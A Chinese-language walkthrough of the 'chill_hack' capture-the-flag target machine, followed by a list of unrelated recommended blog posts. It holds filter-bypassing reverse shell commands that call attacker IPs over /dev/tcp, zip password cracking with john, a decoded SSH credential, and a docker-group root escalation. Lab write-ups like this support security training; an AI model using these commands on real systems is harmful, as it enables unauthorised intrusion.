chill_hack靶机攻略

chill_hack靶机攻略

扫描

渗透

ftp开放,提示ftp连接

连接过后发现一个文本文件

下载下来

复制代码
ftp 10.4.7.155
ftp
ftp
dir
get note.txt

查看内容

此处可以知道两个用户名,并且提示命令被过滤

复制代码
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.132/8888 0>&1'
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.138/12138 0>&1'

提权

使用sudo -l

发现可以以appar身份执行.sh文件

看代码感觉没什么用

在/var/www/files中发现hacker.php

查看源码

两行提示可能有图片隐写

靶机开启pythonweb服务

使用工具

复制代码
steghide extract -sf hacker-with-laptop_23-2147985341.jpg

发现有个压缩包,但是解压需要密码

复制代码
zip2john backup.zip > backup.john
# 将名为 backup.zip 的 ZIP 文件的密码哈希提取出来,并将结果保存到名为 backup.john 的文件中

john --wordlist=/usr/share/wordlists/rockyou.txt backup.john 
复制代码
pass1word

查看一下解压出来的东西

发现密文

复制代码
IWQwbnRLbjB3bVlwQHNzdzByZA==
#base64解码
!d0ntKn0wmYp@ssw0rd

家目录下可以看到有三个用户,挨个尝试ssh登录,发现只有anurodh可以登录

复制代码
anurodh:!d0ntKn0wmYp@ssw0rd

id发现该用户在docker组内

怀疑在docker里

查看该文件,确认一下是不是在docker里

发现就是在docker里

查看docker镜像

复制代码
docker images

提权

复制代码
docker run -it -v /root:/mnt alpine
相关推荐
nnsix1 分钟前
MVC、MVP、MVVM 架构 笔记
java·开发语言·前端
网管NO.12 分钟前
SQL 企业实战全流程|全覆盖前置基础 + 核心语法(MySQL8.0 可直接运行)
数据库·oracle
野生技术架构师3 分钟前
2026最新Java面试1200题全解析:从基础到架构,覆盖所有技术栈(含答案)
java·面试·架构
头歌实践平台4 分钟前
HBase 完全分布式安装(新)
数据库·分布式·hbase
大尚来也4 分钟前
主键、外键、索引,一篇讲透
java·数据库·oracle
架构源启5 分钟前
Spring AI进阶系列(13)- 安全最佳实践(进阶版):Prompt注入防护、数据泄露预防与合规审计实战
人工智能·安全·spring
Smile_2542204187 分钟前
vue3 + ts reactive方式清空表单对象
开发语言·前端·javascript
消失的旧时光-19438 分钟前
Android企业级网络架构实战:一套完整的双Token认证解决方案 ——(401自动续期|请求重放|RefreshToken刷新|并发401治理)
网络安全·网络框架·双token·android 网络认证架构
j7~8 分钟前
【MYSQL】表的内外连接--详解(重点)
数据库·mysql·内连接·左外连接·右外连接
段ヤシ.10 分钟前
回顾Java知识点,面试题汇总Day17(持续更新)
java·springboot·spring security·shiro·mybatis-plus·jdbctemplate·spring data jpa